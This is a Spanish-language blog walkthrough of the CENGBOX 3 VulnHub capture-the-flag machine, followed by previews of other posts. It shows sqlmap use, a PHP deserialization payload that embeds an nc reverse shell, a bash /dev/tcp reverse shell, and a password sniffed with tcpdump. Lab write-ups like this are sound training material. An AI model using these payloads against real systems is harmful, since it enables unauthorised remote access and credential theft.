CENGBOX: 3: vhost + PHP unserialize

 https://www.vulnhub.com/entry/cengbox-3,576/

Difficulty : Intermediate / Hard

1-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-04 18:17 CEST
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

2-
En 80 no encontramos nada reseñable. La clave está en acceder por 443 y fijarnos en el certificado SSL que nos va a dar el vhost:

ceng-company.vm 

3- 

A partir de ahí buscar gobuster vhost

gobuster vhost -u https://ceng-company.vm -w ../../combdir -t 128 -k

y sacamos el subdominio que nos interesa: 

https://dev.ceng-company.vm/

4- 

Tenemos una entrada de login que atacamos con sqlmap

sqlmap -u 'https://dev.ceng-company.vm/login.php' --data 'username=admin&passwd=admin' --dbs

y sacamos las credenciales de admin

5- 

Una vez dentro tenemos un script addpoem.php que envía un poema serializado. Es el punto  vulnerable para introducir un shell reverse. Después de varias pruebas el código que funciona es el siguiente:

GET /addpoem.php?data=O:4:"Poem":3{s:8:"poemName";s:6:"x";s:10:"isPoetrist";O:8:"poemFile":2:{s:8:"filename";s:23:"/var/www/html/test9.php";s:8:"poemName";s:97:"<?php system('rm /tmp/ff;mkfifo /tmp/ff;cat /tmp/ff|bash -i 2>&1|nc 192.168.2.84 8888 >/tmp/ff');";}s:9:"poemLines";s:20:"x";} HTTP/1.1

6- 

hay un user eric y le encontramos un script en opt/login.py que se ejecuta en cron, en lo que parece que utiliza dos archivos auxiliares: check.sh y whatismyip.py. No podemos ver el contenido del login.py. Tenemos además tcpdump con capabilities allow any user to sniff packets

getcap -r / 2</dev/null

/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep

que es lo que nos lleva a pensar en monitorizar la red local para ver qué hace el login.py

tcpdump -i lo -vvv -A

01:17:01.621029 IP6 (flowlabel 0x12f31, hlim 64, next-header TCP (6) payload length: 77) localhost.60348 > localhost.http: Flags [P.], cksum 0x0055 (incorrect -> 0xeba7), seq 210:255, ack 1, win 342, options [nop,nop,TS val 8377147 ecr 8377146], length 45: HTTP

`./1.M.@...................................P_'.!Gl.V...V.U.....

...;...:username=eric&password=3ricThompson%2ACovid19

nos da las credenciales de eric

7- 

una vez dentro solo hay que modificar el login.py que se ejecuta como root con otro shell reverse

import os; os.system("bash -c 'bash -i >& /dev/tcp/192.168.2.84/9999 0>&1'");

                                                                                                                                      
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9999
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.2.135.
Ncat: Connection from 192.168.2.135:52700.
bash: cannot set terminal process group (5331): Inappropriate ioctl for device
bash: no job control in this shell
root@cengbox:~# 


Comentarios

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentació...
Leer más

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...
Leer más

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...
Leer más